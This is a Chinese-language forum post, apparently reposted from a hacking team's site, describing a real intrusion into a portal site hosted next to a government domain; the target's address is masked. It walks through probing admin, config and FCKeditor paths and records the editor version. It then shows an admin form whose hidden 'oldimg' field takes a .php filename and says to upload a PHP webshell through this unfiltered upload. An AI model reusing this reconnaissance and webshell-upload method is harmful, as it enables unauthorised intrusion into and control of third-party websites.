我们先来看下这个站 www.2cto.com(为规避法律问题仅用本站网址替代目标网址) 上图: http://www.xxx.gov.cn/ 旁站下有这个站 有点可怕 我们来看看 http://www.2cto.com /newsite/admin/ 很明显这是后台 根本没试,估计都不成功,这是经验 不过有时候可以试试 cncmmo cncmmo.com http://www.2cto.com /inc/config.php connection failure http://www.2cto.com /inc/conn.php http://www.2cto.com /FCKeditor/_whatsnew.html 有个FCK 版本Version 2.6.3 http://www.2cto.com /FCKeditor/editor/filemanager/connectors/test.html ="Sorry, can't map "UserFilesPath" to a physical path. You must set the "UserFilesAbsolutePath" value in "editor/filemanager/connectors/php/config.php"." /> 读,.你们懂的 这里就不解释了 FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp 404 但我不是利用他 我是利用后台的一个鸡勒洞,变向设计 漏洞 , <input type="hidden" name="__hash__" value="9f133e1e1d740ba69c45f78b8c732a4c" /></form> 查看源代码 <input type="hidden" name="id" id="id" value="284"/> <input type="hidden" name="actiontype" id="actiontype" value="update"/> <input type="hidden" name="articlecatid" id="articlecatid" value="8"/> <input type="hidden" name="oldimg" id="oldimg" value="20120406144702.php"/> <input type="submit" value="提交" /> <A HREF="javascript:history.back()" class="gobackhref">返 回</A> </td> </tr> 随便上个PHP大马,提交后查看源代码 原文来自:Root Security Team http://root-sec.org/thread-498-1-1. html
查看更多关于无过滤的一次秒杀门户站 - 网站安全 - 自学php的详细内容...